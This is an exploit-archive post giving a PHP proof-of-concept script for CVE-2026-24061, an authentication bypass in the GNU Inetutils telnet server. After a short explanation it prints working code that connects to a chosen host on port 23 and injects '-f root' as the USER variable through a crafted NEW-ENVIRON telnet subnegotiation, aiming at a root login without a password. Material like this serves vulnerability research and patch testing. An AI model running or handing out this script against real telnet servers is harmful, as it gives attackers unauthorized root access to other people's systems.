📄 GNU Inetutils 2.7 Authentication Bypass

=============================================================================================================================================
    | # Title     : GNU Inetutils Telnet Authentication Bypass PHP Proof of Concept                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.gnu.org/software/inetutils/                                                                                     |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215519/  & 	CVE-2026-24061
    
    [+] Summary    : This PHP script is a PoC demonstrating a potential authentication bypass vulnerability in GNU Inetutils Telnet server identified as CVE-2026-24061.
    
    [+] The exploit works by:
    
    Establishing a TCP connection to the target Telnet service (default port 23).
    
    Crafting a malicious Telnet NEW-ENVIRON subnegotiation payload.
    
    Injecting a forged USER environment variable value.
    
    Attempting to manipulate the authentication process through improper handling of Telnet option negotiation.
    
    [+] The script:
    
    Connects to a specified host.
    
    Sends a specially crafted Telnet negotiation sequence.
    
    Attempts to bypass authentication by injecting -f root into the environment variable.
    
    Displays any response received from the target service.
    
    [+] POC :
    
    <?php
    
    set_time_limit(10);
    
    $host = $argv[1] ?? "127.0.0.1";
    $port = 23;
    $username = "root";
    
    echo "[*] Connecting to $host:$port...\n";
    
    $socket = fsockopen($host, $port, $errno, $errstr, 5);
    if (!$socket) {
        die("[-] Connection failed: $errstr ($errno)\n");
    }
    
    stream_set_timeout($socket, 2);
    
    $IAC  = chr(255);
    $SB   = chr(250);
    $SE   = chr(240);
    $WILL = chr(251);
    $DO   = chr(253);
    
    $OPT_NEW_ENVIRON = chr(39);
    $NEW_ENVIRON_IS  = chr(0);
    $NEW_ENVIRON_VAR = chr(0);
    $NEW_ENVIRON_VALUE = chr(1);
    
    fread($socket, 1024);
    
    $payload  = $IAC . $SB . $OPT_NEW_ENVIRON;
    $payload .= $NEW_ENVIRON_IS;
    $payload .= $NEW_ENVIRON_VAR . "USER";
    $payload .= $NEW_ENVIRON_VALUE . "-f " . $username;
    $payload .= $IAC . $SE;
    
    echo "[*] Sending authentication bypass...\n";
    fwrite($socket, $payload);
    fflush($socket);
    
    $response = fread($socket, 4096);
    
    if ($response) {
        echo "[+] Response received:\n";
        echo $response . "\n";
    } else {
        echo "[-] No response.\n";
    }
    
    fclose($socket);
    
    echo "[*] Done.\n";
    ?>
    
    summary en titel
    	
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================